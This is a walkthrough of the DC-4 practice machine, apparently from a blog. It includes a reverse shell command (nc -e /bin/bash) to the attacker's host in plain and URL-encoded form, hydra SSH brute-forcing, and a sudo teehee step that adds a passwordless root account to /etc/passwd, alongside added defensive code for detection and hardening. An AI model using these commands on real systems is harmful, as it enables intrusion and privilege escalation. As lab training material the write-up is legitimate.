DC-4 Target Machine Writeup (WP)

Note that unauthorized penetration testing is illegal; all the attacks here are against official practice target machines.

Foreword

1. Prerequisites

2. Penetration attack

1. Idea

2. Penetration process

2.1 Information Collection

2.2 Vulnerability discovery

2.3 Privilege escalation

3. Summary


Foreword

The DC series target machines are virtual machines built specifically for penetration testing and network security labs. They offer a range of vulnerabilities and attack scenarios in which penetration testers can exercise their skills and tools. The series covers several themes, such as vulnerabilities in various operating systems, web application security and wireless network security. They are valuable to beginners and professionals alike, because they teach what security vulnerabilities look like and how they are exploited during a penetration test.


1. Prerequisites

Attacker machine: Kali

IP address: 192.168.9.128

Target machine: DC-4 (linux)

IP address: 192.168.9.131

DC-4 download link: http://www.five86.com/downloads/DC-4.zip

Network: the two hosts must be on the same LAN, so the virtual machines' network adapters must be in the same mode (NAT or bridged)

Goal: find the flag


2. Penetration attack

1. Idea

A penetration test needs a plan; mine is:

Information gathering -> find vulnerabilities -> exploit vulnerabilities (SQL injection, file upload vulnerabilities, framework vulnerabilities, SSH attacks, etc.) -> reverse shell -> privilege escalation

2. Penetration process

2.1 Information Collection

We first use the netdiscover tool to find live hosts by ARP scanning.

netdiscover -r 192.168.9.0/24

We found the target machine's IP address, 192.168.9.131, and then used nmap to scan its ports for details.

nmap -sT -O 192.168.9.131

Ports 80 and 22 are open on the target, i.e. HTTP and SSH, so there is a website; let's open it in the browser first.

We found a login page; let's run a directory scan and fingerprint the site first to look for clues.

dirsearch -u http://192.168.9.131

The directory scan turned up no other suspicious or useful pages. Let's check what framework the site uses, in case that gives us a starting point.

whatweb http://192.168.9.131/


2.2 Vulnerability discovery

No framework was identified, so let's capture the login request with Burp Suite (bp) and take a look.

The captured request shows the username and password we typed in plain form, so I decided it was time to brute-force the login and pulled out my trusty wordlist.

The brute force gave us a username and password; let's log in and see what the page looks like.

Username: admin

Password: happy

Seeing this page, I could roughly guess that it is an arbitrary command execution vulnerability, and capturing the request confirms it.

Sure enough, the command we supplied was executed, so we go for a reverse shell with the usual three steps (intercept, modify, forward).

Attacker machine:
nc -lvp 9999
Target machine:
nc -e /bin/bash 192.168.9.128 9999

After forwarding the request, no connection came back. Burp may not have delivered the command as typed, so I URL-encoded the command with Burp's built-in encoder and resent it.

%6e%63%20%2d%65%20%2f%62%69%6e%2f%62%61%73%68%20%31%39%32%2e%31%36%38%2e%39%2e%31%32%38%20%39%39%39%39%20

The reverse shell connected and we now have shell access; next we upgrade it to an interactive shell.

python -c 'import pty;pty.spawn("/bin/bash")'

Already got the interactive shell.
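The root cause found in 2.2 is a form value handed straight to a shell. The following is an added Python example, not code from the original post or from the DC-4 image, showing that vulnerable pattern beside an allowlist version; the three action names and their argv table are constructed for illustration.

```python
import subprocess

# Constructed allowlist for this example; the real DC-4 page's options are not
# reproduced here, so these three actions are an assumption.
ALLOWED_ACTIONS = {
    "list": ["ls", "-l", "/tmp"],
    "disk": ["df", "-h"],
    "kernel": ["uname", "-r"],
}

def run_vulnerable(posted_value):
    """The pattern behind the writeup's finding: the submitted form value goes
    to a shell unchanged, so whoever edits the request in Burp chooses the
    command the web server's user runs."""
    done = subprocess.run(posted_value, shell=True, capture_output=True, text=True)
    return done.stdout

def is_allowed_action(posted_value):
    """Exact-match check: 'disk' passes, 'disk; id' or 'df -h' does not."""
    return posted_value in ALLOWED_ACTIONS

def resolve_action(posted_value):
    """Hardened lookup: the value is only a key into a fixed table; anything
    else is rejected before any process starts."""
    if not is_allowed_action(posted_value):
        raise ValueError("unknown action: %r" % posted_value)
    return list(ALLOWED_ACTIONS[posted_value])

def run_hardened(posted_value):
    """Run the resolved argv without a shell, so request metacharacters never
    reach an interpreter; a rejected value raises before execution."""
    done = subprocess.run(resolve_action(posted_value), capture_output=True, text=True)
    return done.stdout
```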


2.3 Privilege escalation

whoami 
id

Our privileges are not enough, so I looked around for clues and found three users in the home directory, with something interesting under jim.

cd /home
ls
cd jim
ls
cat text.sh
cd backups
ls
cat old-passwords.bak

Having found the old passwords, copy them into a local file first.

vim password.bak

Remembering the SSH service on port 22, I figured it could be brute-forced with these.

hydra -l jim -P password.bak -t 32 ssh://192.168.9.131:22

The password was found, and we can log in over SSH.

Username: jim

Password: jibril04
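From the defender's side, the hydra run above leaves a distinctive trace in sshd's log: many failed passwords for one user from one source, then a success. As an added Python example (not from the original post), a small detector over a constructed auth.log excerpt; the host name, PIDs and ports in the sample are made up.

```python
import re
from collections import defaultdict

# Constructed sshd log excerpt for this example (not captured from the page's target).
SAMPLE_AUTH_LOG = """\
Jun 20 10:01:01 dc-4 sshd[1201]: Failed password for jim from 192.168.9.128 port 50001 ssh2
Jun 20 10:01:01 dc-4 sshd[1202]: Failed password for jim from 192.168.9.128 port 50002 ssh2
Jun 20 10:01:01 dc-4 sshd[1203]: Failed password for jim from 192.168.9.128 port 50003 ssh2
Jun 20 10:01:02 dc-4 sshd[1204]: Failed password for jim from 192.168.9.128 port 50004 ssh2
Jun 20 10:01:02 dc-4 sshd[1205]: Failed password for jim from 192.168.9.128 port 50005 ssh2
Jun 20 10:01:02 dc-4 sshd[1206]: Failed password for jim from 192.168.9.128 port 50006 ssh2
Jun 20 10:01:03 dc-4 sshd[1210]: Accepted password for jim from 192.168.9.128 port 50010 ssh2
Jun 20 10:07:40 dc-4 sshd[1300]: Failed password for charles from 192.168.9.50 port 40000 ssh2
Jun 20 10:07:55 dc-4 sshd[1301]: Accepted password for charles from 192.168.9.50 port 40001 ssh2
"""

LINE_RE = re.compile(
    r"sshd\[\d+\]: (?P<result>Failed|Accepted) password for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>[\d.]+) port \d+"
)

def detect_ssh_bruteforce(log_text, threshold=5):
    """Count failed passwords per (source IP, user); once a pair reaches
    `threshold` it is reported, and a later success for the same pair is
    recorded too, which is the hydra-then-login pattern in the writeup.
    A single typo-then-success (charles here) stays below the threshold."""
    failures = defaultdict(int)
    findings = {}
    for line in log_text.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue
        key = (m["ip"], m["user"])
        if m["result"] == "Failed":
            failures[key] += 1
            if failures[key] >= threshold:
                entry = findings.setdefault(key, {"failures": 0, "success_after": False})
                entry["failures"] = failures[key]
        elif key in findings:
            findings[key]["success_after"] = True
    return findings
```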

whoami
id
sudo -l

Still no useful privileges, but the login banner tells jim that he has mail, so let's read it (mail is usually stored under /var).

cd /var/mail
cat jim

The mail contains Charles' password (sent in plain text, what a model employee), so we switch to Charles' account.

Username: charles

Password: ^xHhA&hvim0y

su charles
ls
id
whoami
sudo -l

This account is allowed to run the teehee command with sudo; let's find out what the command does.

In short, the command appends a line to the end of a file. If you have sudo rights to it, you can escalate privileges.

We run the append command.

(Why this file and this line work is explained in my Linux software installation & account permissions [2] article.)

sudo teehee -a /etc/passwd
demo::0:0:::/bin/bash

Checking the passwd file shows the account was added, so we switch directly to the new demo user.

su demo
id
whoami

The user is already root.
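From the defender's side, the two things that change on the host in this section are the extra UID-0 line in /etc/passwd and a sudo rule that hands a user a file-writing tool. As an added Python example (not from the original post), a small audit over a constructed passwd file and a constructed sudoers excerpt; the sudoers wording and the list of file-writing tools are assumptions.

```python
import re

# Constructed /etc/passwd as it looks after the writeup's `teehee -a` step
# (sample content, not copied from the DC-4 image).
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
jim:x:1001:1001:Jim,,,:/home/jim:/bin/bash
charles:x:1002:1002:Charles,,,:/home/charles:/bin/bash
demo::0:0:::/bin/bash
"""

# Constructed sudoers excerpt; the exact rule on DC-4 is an assumption here.
SAMPLE_SUDOERS = """\
Defaults env_reset
root ALL=(ALL:ALL) ALL
charles ALL=(ALL) NOPASSWD: /usr/bin/teehee
"""

def audit_passwd(text):
    """Flag UID-0 accounts other than root and accounts with an empty password field."""
    findings = []
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) != 7 or line.startswith("#"):
            continue
        name, pw, uid = fields[0], fields[1], fields[2]
        if uid == "0" and name != "root":
            findings.append(("extra-uid0", name))
        if pw == "":
            findings.append(("empty-password", name))
    return findings

def audit_sudoers(text, file_writers=("teehee", "tee", "dd", "cp")):
    """Flag non-root rules granting ALL or a file-writing tool; note if a password is required."""
    findings = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(("#", "Defaults")) or "=" not in line:
            continue
        user, rhs = line.split("=", 1)
        user = user.split()[0]
        if user == "root":
            continue
        rhs = re.sub(r"^\s*\([^)]*\)\s*", "", rhs)  # drop the (runas) spec
        tag = "NOPASSWD" if "NOPASSWD:" in rhs else "password"
        for cmd in rhs.split(":")[-1].split(","):
            cmd = cmd.strip()
            if cmd == "ALL" or cmd.rsplit("/", 1)[-1] in file_writers:
                findings.append((user, cmd, tag))
    return findings
```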

So we use find to search the whole filesystem for the flag and read it.

find / -name "*flag.*" 2>/dev/null
cat /etc/passwd

The flag was found under root's directory.


3. Summary

How DC-4 was broken:

1. First we did host discovery and fingerprinted the target's website, and found that it used no framework.

2. Then we captured the login request with Burp and found that the login could be brute-forced.

3. Inside the site we found an arbitrary command execution vulnerability, sent a reverse shell command, got a shell, and used python to upgrade it to an interactive shell.

4. We first landed in the html user; in the home directory we found jim's old passwords, brute-forced SSH with them, and found charles' password in jim's mail. As charles we found sudo rights to the teehee command, used it to escalate to root, and found the flag in root's directory.


Origin blog.csdn.net/m0_66638011/article/details/131343447